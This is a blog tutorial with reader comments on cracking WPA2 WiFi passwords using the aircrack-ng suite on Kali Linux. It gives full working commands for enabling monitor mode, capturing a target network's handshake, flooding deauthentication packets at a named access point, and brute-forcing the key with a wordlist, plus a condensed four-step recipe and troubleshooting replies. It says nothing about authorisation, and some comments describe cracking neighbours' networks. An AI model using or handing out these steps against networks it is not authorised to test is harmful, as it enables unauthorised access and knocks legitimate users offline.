Cracking WPA2 WiFi password using aircrack-ng Kali Linux

Cracking WPA2 wifi password is not really an easy thing to do,
no you can't crack it with a click and there is no software that will give you the password without some hard work ...
don't run away still you can crack it  with few steps here :) and we will do it using aircrack-ng

For a fast wifi cracking check this video

Requirements: To crack a wpa2-psk encrypted wifi password using aircrack-ng

1- Kali Linux or any Linux system with aircrack-ng installed
  a- if you don't have aircrack-ng suite get it by this commend in terminal
sudo apt-get install aircrack-ng
2- a wireless network adapter that support monitor mode like
  a- Alfa 2W AWUS036NH
  b- Alfa AWUS036H
  c- wifiy-city 56G
  d- and you can check this page here for card compatibility compatibility drivers
3- a word list comprising of all the possible different combination of pass-phrases

Now let's get to work
i will be using wifiy-city 56G card on Kali linux 2 sana

1) open up your terminal as root and type
ifconfig
this will show you all the networking interfaces connected to your device.

if your wireless network adapter is working fine you should see the " wlan0 " the name may change if you have more then one connected wireless adapter.

2) now to start monitor mode type
airmon-ng start wlan0 
'airmon-ng' is a traffic monitoring tool
‘wlan0’ is your wireless interface
after this commend we started the monitor mode
as it's seen the monitor mode is working under wlan0mon , so this is your card name for now
in the red area a list of process id’s that cause trouble during the process so kill those processes by typing
kill <pid>
 in my case
kill 743 898 1070 1071 1081 
 now type ifconfig and this will show the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 .

3) to show list of available WiFi network type
airodump-ng wlan0mon

airodump-ng is a wifi packets capturing tool
wlan0mon is my  monitoring interface
airodump-ng  will start capturing all packets and from the captured packets
select your target and note its ‘bssid’ (bssid = base service set identifier) and channel
then stop the capture using “cntrl+c“.

4) Start capturing the packets of your target network
type the following command
airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon 
i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 

 this will start the capturing of packets.
and if you get the handshake you wont need the aireplay command...
if you don't get the handshake yet
while the capturing of packets goes on, open a new terminal as root and type
aireplay-ng -0 0 -a <bssid> mon0
aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
-0 = number associated for deauthentication,
0 = deauth count,
-a = bssid) here we are trying to send a deauthentication request.
In my case the command looks like
aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

after few seconds stop it using cntrl+c.
now after we have successful captured the wpa handshake

5) Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and files.
Select the file with “.cap“extension and type the following command
aircrack-ng -w <full location of the word list> <name of the file>
aircrack-ng is a tool that helps in cracking the password
In my case the command looks like
aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
For the Wordlist Check this Post Best Password dictionary
Now it starts finding suitable passphrase.

and now all you have to do is wait till you see the lovely news ( KEY Found  ( your key is here ;) ).

all Step in few lines
1) airodump-ng wlan0mon
2) airodump-ng -c 9 -w wifi  --bssid C4:6E:1F:F6:34:B8 wlan0mon
3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

have a great day :)
you can check the video in youtube and see how its working and cracking 

Best wifi Adapter to work with Aircark
                Here is a list of Wireless cards that support injection and monitor mode
1. Alfa AWUS036NHA –(2.4GHz) http://amzn.to/1RzUNKR
2. TP-LINK TP-WN722N $13.44 http://amzn.to/1SMe8b1
3. AWUS036H – (2.4GHz) $26.99 http://amzn.to/1UDrZnr
4.TP-Link WN722N (2.4GHz) $18.97 http://amzn.to/1UDsii4
5.D-Link DWA-110 http://amzn.to/1RXovvp

how to Crack WPA2 wifi password using aircrack-ng Kali linux 2

Labels: ,

Post a Comment

  1. What is morethan.txt tell me plss i have rockyou.text.gz is this both same

    ReplyDelete
    Replies
    1. Check this post i just wrote it , after reading it you will understand everything about rockyou.text.gz and what i meant by morethan8.txt
      http://kalitut.blogspot.com/2015/12/best-password-dictionary.html

      Delete
    2. hey my nme is demi i want to be came the best goverment tool {HACKER} please make me your student.demistusdamian@gmail.com(my nick name HAWK)

      Delete
  2. After entering last command I get error "directory doesn't exist" I check the file and it is under usr/share/wordlists, am I entering wrong command?

    ReplyDelete
    Replies
    1. aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

      dose your file have the same name as mine ? ( more_than_8.txt ) ?

      Delete
    2. dude your using an OS bigger than you... start using those easy phone app for hacking, XlOL..

      Delete
    3. there is nothing bigger then human mind in here !
      if he want to do it he will learn to do it

      Delete
  3. I have googled extensively regarding my wireless card, and followed literally hundreds of step by steps guides with fw cutter ect. What im getting is i can switch to mon mode, I can see my AP and others, I did aireplay injection test, shows injection is working! BUT! When I try to authenticate on my AP I never actually get any handshake also I can never see clients I manually connect to my AP. I know im close enough because its my own AP literally a meter away from my machine, Its definately in monitor mode and I can inject 'so it says'. Just not sure where im going wrong. My device is the Broadcom b4312 lpphy rev 01. I blacklisted other drivers ect and when i use check it says device b43x so assuming its running the correct driver and FW cutter didnt show any errors so assuming the firmware has been patched. Spent days and days with this one, any tips would be massively appreciated. Many thanks.

    ReplyDelete
    Replies
    1. DEAUTH - DOESNT WORK, Associated clients on my network dont show when I manually connect another machine to my own AP to see if airodump picks it up. I tried to DEAUTH all clients on AP and nothing. Fake auth doesnt work as I get nothing with open system and sharedkey shows error locating sharedkey file

      Delete
    2. i'm sorry with this problem i cant help coz i do face the same problem sometime and couldn't really find a way to fix it yet

      some AP give me the handshake and some not
      my friend house is close to mine i can get his AP handshake
      and at the same time i cant get my AP handshake and its closer then his AP
      i just don't really understand the problem behind this

      Delete
  4. Hi bro .....once you found keys so how to use them .....plz tell me bro....

    ReplyDelete
    Replies
    1. You put it on your computer like you want to connect to the wifi

      Delete
  5. Hi bro am happe for what you did. Get an error :
    BSSID
    **********
    ESSID
    **********
    ENCRYPTION
    No data - WEP or WPA

    Choosing first network as target

    Opening ******.cap

    Got no data packets from target network

    Quitting aircrack-ng

    ReplyDelete
    Replies
    1. Can you help me to solve it thanks again :)

      Delete
    2. Maybe it's because i use a DVD in live amd64 mode. I didn't installe kali just use it in live mode

      Delete
    3. you need to get the handshake again so start the task all over

      Delete
  6. It's been more than 24mins but its not showing handshake what to do now ?? Please help .

    ReplyDelete
    Replies
    1. This comment has been removed by the author.

      Delete
    2. Most wifi adapters are made to get signal within your own home. Get a wifi adapter with a RTL8187L chipset such as the Alpha models.. They have good range.

      Delete
  7. hi bro last order aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
    give me pleas specify a dictionary option -w

    ReplyDelete
    Replies
    1. change the .cap file name with your .cap file name !
      change more_than_8.txt with your own dictionary file name !

      if you don't know how to get the dictionary check this post
      https://kalitut.blogspot.com/2015/12/best-password-dictionary.html

      Delete
    2. I changed the name and it still tells me to specify a dictionary option. What do I do?

      Delete
  8. Hi man i am using a Ralink wireless USB adapter am i going to achieve result.

    ReplyDelete
    Replies
    1. Just put your .cap file on desktop and simply drag and drop to terminal.

      Delete
  9. My file is in home and when i type aircrack-ng -w /home/wifi-01.cap
    I get an error saying the file does not exist. What do I type?

    ReplyDelete
    Replies
    1. try the comment without /home/

      so it should look like this aircrack-ng -w wifi-01.cap

      Delete
    2. help!! i tried aircrack-ng -w wifi-01.cap
      and no file to crack specified.

      Delete
    3. help!! I tried aircrack-ng -w wifi-01.cap
      and No file to crack specified.

      Delete
  10. How about the same tutorial for 2016.1? Because many of us are having issues with packet injection, even with the correct driver/chipset.
    I do not want to install an older version.

    ReplyDelete
    Replies
    1. will make one soon but what about the AP you are targeting is it N or the old chipset ?

      Delete
  11. How about the same tutorial for 2016.1? Because many of us are having issues with packet injection, even with the correct driver/chipset.
    I do not want to install an older version.

    ReplyDelete
  12. Hello. I found this blog after attempting many times to crack my own WiFi access point. I'm using an Alfa AWUS036NH USB adapter, running a Kali VM on Ubuntu. After trying these steps and other variations of them, I found a command on another site:

    aireplay-ng -9 wlan0mon

    I read that it's supposed to if packet injection is supported by my adapter. But I'm wondering if it really is to test if any Access Points it finds are able to be packet injected. Does anyone know? The response to this command was something to the affect of:

    No Answer...
    Found 0 APs

    Can anyone clarify? Thanks in advance!

    ReplyDelete
    Replies
    1. aireplay-ng is a tool for deauthentication
      what it really do is disconnect all user to the AP and then when they reconnect you start capturing the packets

      Delete
    2. This comment has been removed by the author.

      Delete
    3. Thanks for your response.

      So that command does not do what I thought it did? Because it did not disconnect all users from the AP either. It looked like it was searching for APs and didn't find any. Basically I can't get this tutorial(or any other variation that I've found online) to work for deauthentication or capturing packets. I've tried my AP and several others that get a decent signal.

      Could it just be the case that alo APs within my range are protected against this type of attack?

      Delete
    4. the command aireplay-ng should disconnect all users from the AP...
      in your case i'm not sure whats the problem ...
      but whats the wifi adapter you are using ? name it

      Delete
    5. Walid- As I said in my original question I'm using the Alfa AWUS036NH USB adapter. This adapter was recommended by the initial resource I was looking at for cracking WiFi, so I'm thinking it should have the necessary capabilities. Thanks.

      Delete
    6. oh im sorry i forget its an Alfa AWUS036NH...
      okay will as you know this adapter should work fine ... now we have to check the AP so whats your AP name and version

      Delete
    7. No problem. It's an Arris TG1682G. The hardware rev is 9.0

      Delete
  13. Replies
    1. Great :) what WiFi adapter are you using ?

      Delete
  14. Hello Walid,

    What adapter should I use?

    ReplyDelete
    Replies
    1. hi there , there is a list at the end of the post for adapters that works with this tutorial

      1. Alfa AWUS036NHA –(2.4GHz) http://amzn.to/1RzUNKR
      2. TP-LINK TP-WN722N $13.44 http://amzn.to/1SMe8b1
      3. AWUS036H – (2.4GHz) $26.99 http://amzn.to/1UDrZnr
      4.TP-Link WN722N (2.4GHz) $18.97 http://amzn.to/1UDsii4

      al of them work fine but alfa adapters is the best of the best

      Delete
  15. I want to learn to hack please make me your student.

    ReplyDelete
    Replies
    1. you can learn by reading what i have on this website :)

      Delete
  16. Hey ....
    my leptop does not on monitor mode can i hack wifi password without monitor mode.....??????????????????????/

    ReplyDelete
    Replies
    1. no you can't
      you need a USB WiFi adapter

      Delete
  17. dude, to hack, we need near to the AP and couple clients of the AP right? so we can get the handshake? if we only have AP access (because pointing from long distance) we wont be able to hack/crack the password?

    ReplyDelete
  18. This comment has been removed by a blog administrator.

    ReplyDelete
  19. This comment has been removed by a blog administrator.

    ReplyDelete
  20. hey bro! I am happy what you did. Every thing was going fine with these command. But i got problem after last command: #aircrack-ng -w /usr/share/wordlists/wifi.txt ***-01.cap
    error:
    fopen (directory) failed: No such file or directory
    fopen (directory) failed: No such file or directory
    opening ***-01.cap
    Read 509127 packets.
    #BSSID ESSID ENCRYPTION
    xx:xx:xx:xx:xx:xx xyz WPA(1 handshake)

    choose first network as target.
    opening ***-01.cap
    please specify a dictionary (option -w)

    Quitting aircrack-ng.......

    I don't suppose that my cap file has been broken. Am I wrong??what might be the problem??? and what might be the solution??? please provide me guidance..

    ReplyDelete
    Replies
    1. hi bro
      i think the problem is here : /usr/share/wordlists/wifi.txt
      is your Password dictionary in that path ?

      Delete
    2. i think, yes, it is the path of my password dictionary. Because when i wrote command #ls initially it does not shows the rockyou.txt file bt when i wrote #ls command after the execution of first three command of the tutorial i.e cp /usr/share/wordlists/rockyou.txt.gz . , gunzip rock you.txt.gz and cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > wifi.txt it shows the both rockyou.txt and wifi.txt
      i also tried other path i.e Desktop/usr/share/wordlists/wifi.txt
      and Desktop/share/wordlists/wifi.txt
      bt i receive same error.

      Delete
    3. and yea i also tried interchanging the place of -w /usr/share/wordlists/wifi.txt and ***-01.cap bt problem remains same.

      Delete
    4. Error message "fopen(dictionary)failed: No such file or directory"
      This means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.

      Delete
    5. try to change the password dictionary to other name or try just to check it with rockyou.txt
      aircrack-ng -w /usr/share/wordlists/rockyou.txt wifi-01.cap

      Delete
  21. Hey walid...i hv tried many time but wen i aircrack...its show 'please specify a dictionary (option -w)' even i specified 'wifi-01.cap file. So how? Hepp me plz.

    ReplyDelete
    Replies
    1. when it ask you to specify a dictionary you need to specify a txt file that have a list of passwords to try it

      Delete
  22. Heloo walid... i tried so many times as u post here.. but wen aircrack it shows 'please specify a dictionary (option -w)' even i specified the file location. Help me plz

    ReplyDelete
    Replies
    1. Hi Niethiya
      please check this newst post about wifi cracking
      how to hack wifi password

      Delete
  23. what to do if we get the handshake after 'airodump-ng -c -w --bssid wlan0mon'?

    ReplyDelete
  24. after that you need to use a dictionary to find the password !

    ReplyDelete
    Replies
    1. Do I need to try multiple dictionary to determine the password? And can multiple dictionaries be run after another?

      Delete
    2. will you can try as many dictionary as you want till you find the password you are looking for ,,
      i don't know if there is a way to run dictionaries after other but soon i will make a post on how to make one huge dictionary and make the cracking progress faster

      Delete

[blogger]

Author Name

{picture#YOUR_PROFILE_PICTURE_URL} YOUR_PROFILE_DESCRIPTION {facebook#https://www.facebook.com/wTsXDev} {twitter#https://twitter.com/wTsDev} {google#https://plus.google.com/u/0/+AnonSalame} {pinterest#https://www.pinterest.com/Thexwts/} {youtube#https://www.youtube.com/channel/UCg2fUa8Yp-aWDCJYQTVHmBg}

Contact Form

Name

Email *

Message *

Powered by Blogger.